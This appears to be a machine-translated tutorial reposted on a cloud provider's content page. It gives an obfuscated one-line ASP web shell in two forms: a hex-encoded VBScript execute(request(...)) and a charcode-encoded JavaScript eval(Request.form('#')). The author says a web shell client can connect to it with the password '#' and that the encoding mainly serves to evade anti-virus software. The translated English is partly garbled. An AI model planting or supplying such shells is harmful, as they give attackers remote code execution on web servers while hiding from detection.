More cow's Word ASP trojan encryption (remove% of ASP) _vbs

Source: Internet
Author: User
I don't know how to express myself clearly. Let's see the example:
Copy Code code as follows:

<script Language=vbs runat=server>
Execute (Hextostr ("65786563757465287265717565737428636872283335292929"))
Function hextostr (data)
Hextostr= "EXECUTE" "" "" "" ""
C= "&AMP;CHR" (&h)
N= ")"
Do while Len (data) >1
If IsNumeric (Left (data,1)) Then
Hextostr=hextostr&c&left (data,2) &n
Data=mid (data,3)
Else
Hextostr=hextostr&c&left (data,4) &n
Data=mid (data,5)
End If
Loop
End Function
</script>
<script runat=server Language=javascript>eval (String.fromCharCode (
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116 , 99,1
04,40,101,41,123,125)) </SCRIPt>

But after the encryption is not a word, haha. This s end can be connected with Haiyang or ice fox, and the password is #.

In fact, just write a <script language=vbs runat=server> this way, the inside code can be used with JS or VBS and other encryption methods to encrypt the decryption, so that the ASP only Microsoft
That Dongdong can be encrypted, while omitting the% of the ASP. Of course not encrypted also can, call <script Language=vbs runat=server> that is still a sentence, encryption mainly
is to avoid anti-virus software.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.